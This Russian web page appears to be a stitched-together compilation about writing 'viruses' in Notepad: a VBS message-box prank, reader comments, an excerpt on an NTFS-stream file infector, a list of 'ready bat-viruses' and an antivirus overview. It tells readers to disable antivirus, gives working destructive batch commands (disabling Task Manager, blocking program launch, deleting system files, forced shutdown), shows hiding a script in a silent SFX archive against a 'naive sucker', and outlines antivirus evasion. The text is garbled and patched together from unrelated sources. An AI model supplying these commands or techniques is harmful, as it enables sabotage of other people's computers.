Как написать вирусы в блокноте? Пример простого вируса

Создаем вирус-шутку через блокнот. ⁠ ⁠

Здравствуйте! В этом посте (первом) я покажу, как создавать вирус шутку через блокнот. Сразу прошу не бомбить и не писать гневные комменты типа: «Да такого миллион!», «Да что ты знаешь!», «Да пошел ты в жопу!» и т.д. Да, я знаю, что эти «вирусы» создавали давно. Но я к примеру открыл для себя это совсем недавно. Месяца 3 назад.

Ближе к делу: я буду рассказывать что эта шутка вообще делает, буду вставлять скрины и все объяснять. Напомню, это ознакомительный пост! В других постах я буду конкретно писать, как создать такой-то вирус.

Вирус-шутка это программа, которую создают в блокноте. Т.е. пишешь там команды и сохраняешь их определенных форматах. Если все правильно сделано, без ошибок, то вирус-шутка сработает. Кстати, «вирус-шутка» это условное название. В блокноте можно создать и игру, и крестики нолики, часы.

ПРЕДУПРЕЖДЕНИЕ. Перед созданием вируса отключите Анти-Вирус.

1) Создание вируса: Для начала откройте блокнот.

Создаем вирус-шутку через блокнот. Вирус, Обучение, Юмор, Длиннопост

2) В блокноте начинайте писать команду. Для начала скопируйте этот текст туда:

msgbox»Ты не против, если я буду жить у тебя в компе?»,32+4,»Вопрос»

msgbox»Ок, ты не против»,64,»Я понял»

msgbox»Ок, ты не против»,64,»Я понял»

msgbox»Это шутка, это НЕ вирус 🙂 ХАХАХАХА»,64,»Я пошутил»

msgbox»Или же нет. «,64,». «

Я НЕ ЖЕЛАЮ ВАМ ЗЛА! ЭТОТ ВИРУС НЕ МОЖЕТ ПРИНЕСТИ ВАМ И ВАШЕМУ КОМПУ ВРЕДА!

Создаем вирус-шутку через блокнот. Вирус, Обучение, Юмор, Длиннопост

3) Сохраните ваш текст в формате .vbs Смотрите далее.

Создаем вирус-шутку через блокнот. Вирус, Обучение, Юмор, Длиннопост

Создаем вирус-шутку через блокнот. Вирус, Обучение, Юмор, Длиннопост

Создаем вирус-шутку через блокнот. Вирус, Обучение, Юмор, Длиннопост

4) Теперь у вас на Рабочем столе должен появиться вот такой значок:

Создаем вирус-шутку через блокнот. Вирус, Обучение, Юмор, Длиннопост

5) Заходите в него.

6) У вас должен открыться вирус-шутка. Если же не работает, то два варианта: либо у вас включен Анти-Вирус, либо ваш комп не поддерживает это.

Создаем вирус-шутку через блокнот. Вирус, Обучение, Юмор, Длиннопост

7) НЕ ПУГАЙТЕСЬ! ВИРУС-ШУТКА НЕ ПРИНЕСЕТ ВРЕДА. Теперь вам осталось читать то, что там написано, и кликать по кнопкам (любым).

Вы можете изменить в команде вируса текст. Например вместо «Windows удалить?» можно написать «ставьте лайки!». Удачи вам, экспериментируйте со своими вирусами!

И так, как я обещал, это был ознакомительный пост. Вскоре я выложу пост, где подробно опишу все значения, как все делать и т.д. Отпишитесь в тапках как вам мой пост, киньте скрины своего вируса. Мне будет интересно 😀

сука! у меня винда удалилась!

ТС, у вас тоже снегопад? Занятия в школах отменили?

Мне хочется узнать все подробно как это работает что обозначает msgbox, цифры 64; 32+4

VBA макрос еще бы присобачил в виде екселя, что бы кошмарил тупыми вопросами!

сохранить как .bat

можно в конце команду shutdown -s -t nponиcatь

также можно сделать чтобы он не закрывался

а если уже не шутка то можно оффнуть диспетчер задач команда

REG ADD «HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem» /f /v «DisableTaskMgr» /t REG_DWORD /d 0

У меня появились не понятные символы(. Как исправить?

Я такие шутки на Юкозах лет 8-10 назад видел.
PS: про дисковод уж тогда бы запилил.

Да куйня какая-то. Особенно для тех кто юзал ХП без еще сервис пака, когда на клик по банеру открывалось 100500 окон с голыми бабами и флаерами » ПАПА иьет ДОЧКУ. «, или «МАМА отсосала у СЫНА. «

Друзья, напишите то, как я объяснял. Понятно или нет.

Школьник добрался до учебников? Похвально, но баян.

В путь

Есть ввести команды вируса просто в блокноте, при этом, не изменив некоторые системные настройки, то это не будет вирусом – просто нерабочий набор команд, у которых расширение .bat. Чтобы создать полноценный вирус обратимся в настройки:

  • Заходим в «Компьютер»;
  • Там находим папку «Сервис» (если не видно, то нажимаем ALT);
  • В этой же папке находим пункт «Параметры папок»;
  • Следующим шагом будет вход в папку «Вид» и нахождение пункта «Скрывать расширения для зарегистрированных типов файлов», надо убрать с него «галку»;
  • Теперь можем создавать вирус;

Как написать вирусы в блокноте? Пример простого вируса

На первый взгляд код не выглядит страшно, просто несколько немного непонятных команд, в фильмах все иначе, да?

Однако, если расположить документ с вирусом в папку «system32driversetc», заставить его запускаться автоматически и перезапустить компьютер, то случится нечто ужасное: у вас перестанет работать возможность запуска программ, да и вообще нельзя будет выполнить какое-либо действие.

ВНИМАНИЕ: НЕ СТОИТ ЭТОГО ДЕЛАТЬ, ЕСЛИ У ВАС НЕТ ОПЫТА РАБОТЫ С ФАЙЛАМИ В СИСТЕМНОМ РЕЕСТРЕ!

Если просто хотите почувствовать себя взломщиком мирового масштаба, то вместо telnetdrive.bat напишите безобидные процессы: запуск калькулятора, диспетчера задач или стандартной программы для рисования.

Создаем приложение

Кликаешь правой кнопкой мыши на VBS скрипт — жмёшь «Добавить в архив…» — «создать SFX-архив»:

создать SFX архив

Переходишь во вкладку «Дополнительно»- «Параметры SFX» и добваляешь путь для распаковки вируса:

Параметры SFX

Во вкладке «Установка» прописываешь имя файла (name.vbs), который нужно выполнить после распаковки:

Дополнительные параметры SFX

Следующая вкладка «Режимы». Ставишь галку «Скрыть всё» и два раза жмёшь «ОК»:

Режимы SFX

В результате у тебя должно получиться приложение, двойной щелчок мышки по которому запустит механизм безудержного открывания вкладок в браузере наивного лоха:

Рекламный вирус. Приложение

Алгоритм работы вируса

Закрой руководство по формату исполняемых файлов (Portable Executable, PE). Для решения поставленной задачи оно нам не понадобится. Действовать будем так: создаем внутри инфицируемого файла дополнительный поток, копируем туда основное тело файла, а на освободившееся место записываем наш код, который делает свое черное дело и передает управление основному телу вируса.

Работать такой вирус будет только на Windows и только под NTFS. На работу с другими файловыми системами он изначально не рассчитан. Например, на разделах FAT оригинальное содержимое заражаемого файла будет попросту утеряно. То же самое произойдет, если упаковать файл с помощью ZIP или любого другого архиватора, не поддерживающего файловых потоков.

В качестве примера архиватора, поддерживающего файловые потоки, можно привести WinRAR. Вкладка «Дополнительно» в диалоговом окне «Имя и параметры архива» содержит группу опций NTFS. В составе этой группы опций есть флажок «Сохранять файловые потоки». Установи эту опцию, если при упаковке файлов, содержащих несколько потоков, требуется сохранить их все.

Архиватор RAR способен сохранять файловые потоки в процессе архивации

Архиватор RAR способен сохранять файловые потоки в процессе архивации

Теперь настал момент поговорить об антивирусных программах. Внедрить вирусное тело в файл — это всего лишь половина задачи, и притом самая простая. Теперь создатель вируса должен продумать, как защитить свое творение от всевозможных антивирусов. Эта задача не так сложна, как кажется на первый взгляд. Достаточно заблокировать файл сразу же после запуска и удерживать его в этом состоянии в течение всего сеанса работы с Windows вплоть до перезагрузки. Антивирусы просто не смогут открыть файл, а значит, не смогут обнаружить и факт его изменения. Существует множество путей блокировки — от CreateFile со сброшенным флагом dwSharedMode до LockFile/LockFileEx .

Основная ошибка большинства вирусов состоит в том, что, однажды внедрившись в файл, они сидят и покорно ждут, пока антивирус не обнаружит их и не удалит. А ведь сканирование современных винчестеров занимает значительное время, зачастую оно растягивается на многие часы. В каждый момент времени антивирус проверяет всего один файл, поэтому, если вирус ведет кочевую жизнь, мигрируя от одного файла к другому, вероятность, что его обнаружат, стремительно уменьшается.

Мы будем действовать так: внедряемся в файл, ждем 30 секунд, удаляем свое тело из файла, тут же внедряясь в другой. Чем короче период ожидания, тем выше шансы вируса остаться незамеченным, но и тем выше дисковая активность. А регулярные мигания красной лампочки без видимых причин сразу же насторожат опытных пользователей, поэтому приходится хитрить.

Например, можно вести мониторинг дисковой активности и заражать только тогда, когда происходит обращение к какому-нибудь файлу. В решении этой задачи нам поможет специализированное ПО, например монитор процессов Procmon.

Продолжение доступно только участникам

Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

Вариант 2. Открой один материал

Заинтересовала статья, но нет возможности стать членом клуба «Xakep.ru»? Тогда этот вариант для тебя! Обрати внимание: этот способ подходит только для статей, опубликованных более двух месяцев назад.

Крис Касперски

Известный российский хакер. Легенда ][, ex-редактор ВЗЛОМа. Также известен под псевдонимами мыщъх, nezumi (яп. 鼠, мышь), n2k, elraton, souriz, tikus, muss, farah, jardon, KPNC.

Кто просматривает этот контент: «Тема» (Всего пользователей: 0; Гостей: 1)

Здесь готовые Bat-вирусы. Просто ставляем код в bat файл и все.

Убирает рабочий стол

@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

@echo off
shutdown -s -t 1 -c «lol» >nul

@echo off
shutdown -r -t 1 -c «lol» >nul

Запрещает запускать программы

@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul

@echo off
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul

Удаляет звуки Windows

@echo off
del «%SystemRoot%Media» /q >nul

Запрещает заходить в панель управления

@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrent VersionPoliciesExplorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши

del «%SystemRoot%Cursors*.*» >nul

Меняет название корзины

reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f

Признаки

Распространение вируса

Любое заболевание или заражение протекает в скрытой фазе или в открытой, этот принцип присущ и вредоносному программному обеспечению:

  • Устройство начало работать со сбоями, программы, которые работали раньше хорошо, вдруг стали тормозить или вылетать.
  • Медленная работа устройства.
  • Проблема с запуском операционной системы.
  • Исчезновение файлов и каталогов или изменение их содержимого.
  • Содержимое файла подвергается изменению.
  • Изменение времени модификации файлов. Можно заметить, если в папке используется вид «список», или вы посмотрите на свойство элемента.
  • Увеличение или уменьшение количества файлов на диске, и впоследствии увеличение или уменьшение объема доступной памяти.
  • Оперативной памяти становится меньше из-за работы посторонних сервисов и программ.

Троян на сайте

  • Показ шокирующих или иных изображений на экране без вмешательства пользователя.
  • Странные звуковые сигналы.

Что такое .bat-файл и как его создать?

Если очень поверхностно, то это файлы с расширением .bat. Такие файлы несут в себе команды, которые должны быть выполнены командным интерпретатором Windows. Все те команды, которые можно выполнить в окне командной строки, можно вписать в .bat-файл и запустить. Результат будет одинаковым.

Чтобы создать .bat-вирус, нам нужен обычный текстовый редактор. В идеале подойдет для этих целей Блокнот. Создав и открыв новый текстовый документ, Вам нужно вписать туда тот код(команды), которые он должен выполнить. После этого, Вам нужно с помощью меню Сохранить как сохранить этот файл, задав ему какое-либо имя с расширением .bat и указав тип файла Все файлы.

Антивирусные программы

Антивирус — едва ли не первая программа, которую следует установить на компьютер сразу после покупки. И уж во всяком случае, даже не пытаться выходить без него в интернет. Итак, что же такое антивирус? Почему-то многие считают, что антивирус может обнаружить любой вирус, то есть, запустив антивирусную программу или монитор, можно быть абсолютно уверенным в их надежности.

Такая точка зрения не совсем верна. Дело в том, что антивирус — это тоже программа, конечно, написанная профессионалом. Но эти программы способны распознавать и уничтожать только известные вирусы. То есть антивирус против конкретного вируса может быть написан только в том случае, когда у программиста есть в наличии хотя бы один экземпляр этого вируса. Но и у создателей антивирусов есть преимущество!

Дело в том, что существует большое количество вирусов, алгоритм которых практически скопирован с алгоритма других вирусов. Как правило, такие вариации создают непрофессиональные программисты, которые по каким-то причинам решили написать вирус. Для борьбы с такими «копиями» придумано новое оружие — эвристические анализаторы.

С их помощью антивирус способен находить подобные аналоги известных вирусов, сообщая пользователю, что у него, похоже, завелся вирус. Естественно, надежность эвристического анализатора не 100%, но все, же его коэффициент полезного действия больше 0,5. Таким образом, в этой информационной войне, как, впрочем, и в любой другой, остаются сильнейшие. Вирусы, которые не распознаются антивирусными детекторами, способны написать только наиболее опытные и квалифицированные программисты.

Таким образом, на 100% защититься от вирусов практически невозможно (подразумевается, что пользователь меняется дискетами с друзьями и играет в игры, а также получает информацию из других источников, например из сетей). Если же не вносить информацию в компьютер извне, заразиться вирусом невозможно — сам он не родится. Практически все существующие антивирусные программы просты и удобны в пользовании, способны отлавливать почти все существующие сегодня группы вирусов.

Большинство антивирусов способны не просто проверять по запросу пользователя диск на наличие вирусов, но и вести незаметную проверку всех запускаемых на компьютере файлов. Наконец, все современные антивирусы снабжены механизмом автоматического обновления антивирусных баз данных через интернет. Но как выбрать? Существует несколько основных точек зрения на эту проблему. Ряд пользователей считает, что нет ничего лучше отечественных продуктов, наиболее приспособленных к нашей вирусной «атмосфере».

Радует, что оба российских антивируса – Антивирус Касперского и Dr.Web уверенно проходят все без исключения тесты и, стало быть, обеспечивают надлежащий уровень защиты. «Касперский»- рекордсмен по числу отлавливаемых вирусов, к тому же эта программа способна обезвреживать не только классические вирусы, но и «трояны», рекламные и шпионские модули.

Из западных разработок рекомендуется обратить внимание на антивирус NOD32. Этот французский антивирус предпочитают за высокую скорость работы, малый размер и стабильность, к тому же он отлично распознает неизвестные вирусы еще до появления их описания в базе данных.

Безусловно, самый популярный и мощный из отечественных антивирусов, да и на мировой сцене он котируется весьма высоко. Программа «подстроена» под российскую «вирусную атмосферу» и способна дать отпор вирусам отечественно производства. Версия KAV Personal Pro состоит из нескольких модулей.

Scanner, проверяющий жесткие диски на предмет зараженности вирусами. Можно задать полный поиск, правда, такая процедура занимает чересчур много времени. Гораздо лучше выбрать более щадящий режим — Программы по формату, при котором KAV будет проверять не только программы, но и документы, созданные в формате Microsoft Office. После обнаружения вирусов программа предлагает вам на выбор несколько вариантов: вычистить «заразу» из файлов, удалить сами зараженные файлы или переместить их в специальную папку. Можно также вообще отключить режим лечения – тогда ваш антивирус будет только сигнализировать вам об обнаруженных вирусах.

Monitor – эта программа автоматически загружается при запуске Windows. Монитор автоматически проверяет все запускаемые на компьютере файлы и открываемые документы и в случае вирусной атаки подает сигнал тревоги. Более того, монитор просто не дает зараженному файлу загрузиться.

Инспектор- модуль, позволяющий отлавливать неизвестные вирусы. Инспектор использует в своей работе метод контроля изменения размеров файлов. Внедряясь в файл, вирус неизбежно увеличивает его «объем» и вызывает изменение его размера — и тем самым выдает себя с головой.

Mail Checker –модуль, отвечающий за проверку «на лету» сообщений электронной почты.

Script Checker — охотник за вирусными и троянскими скриптами.

Office Guard — аналогичный модуль для проверки каждого загружаемого документа Microsoft Office.

Центр управления – «пульт управления» всеми программами комплекса «Антивирус Касперского». Самая важная функция этой программы – встроенный Планировщик задач, позволяющий осуществлять оперативную проверку в автоматическим режиме, без участия пользователя, но в заданное время.

У Антивируса Касперского масса достоинств – удобство управления, регулярность и частота выпуска обновлений. А также большое количество версий для различных операционных систем. Возможно, именно поэтому Антивирус Касперского лидирует на корпоративном рынке – большинство фирм использует для защиты своих локальных сетей именно этот продукт. Однако назвать Касперского идеальным антивирусом для дома мешает его громоздкость и медлительность – KAV очень требователен к аппаратным ресурсам. И все же…

Заключение

Компьютерные вирусы следуют в своей жизни трем заповедям- Плодиться, Прятаться и Портить. Практически все существующие антивирусные программы просты и удобны в пользовании, способны отлавливать почти все существующие сегодня группы вирусов. Большинство антивирусов способны не просто проверять по запросу пользователя диск на наличие вирусов, но и вести незаметную проверку всех запускаемых на компьютере файлов. Наконец, все современные антивирусы снабжены механизмом автоматического обновления антивирусных баз данных через Интернет.

Не исключено, что появятся и другие проблемы, которые принесут немало неприятностей пользователям и достаточное количество неурочной работы разработчикам антивирусных программ. Но все проблемы, когда-либо встававшие в истории развития вирусов, были довольно успешно решены. Скорее всего так же успешно будут решаться и будущие проблемы, пока еще только витающие идеями в воспаленном разуме вирусописателей.

Вирусы успешно внедрились в повседневную компьютерную жизнь и покидать ее в обозримом будущем не собираются. Несмотря на принятые во многих странах законы о борьбе с компьютерными преступлениями и разработку специальных программных средств защиты от вирусов, количество новых программных вирусов постоянно растет. Это требует от пользователя персонального компьютера знаний о природе вирусов, способах заражения вирусами и защиты от них.

Оцените статью
Fobosworld.ru
Добавить комментарий

Adblock
detector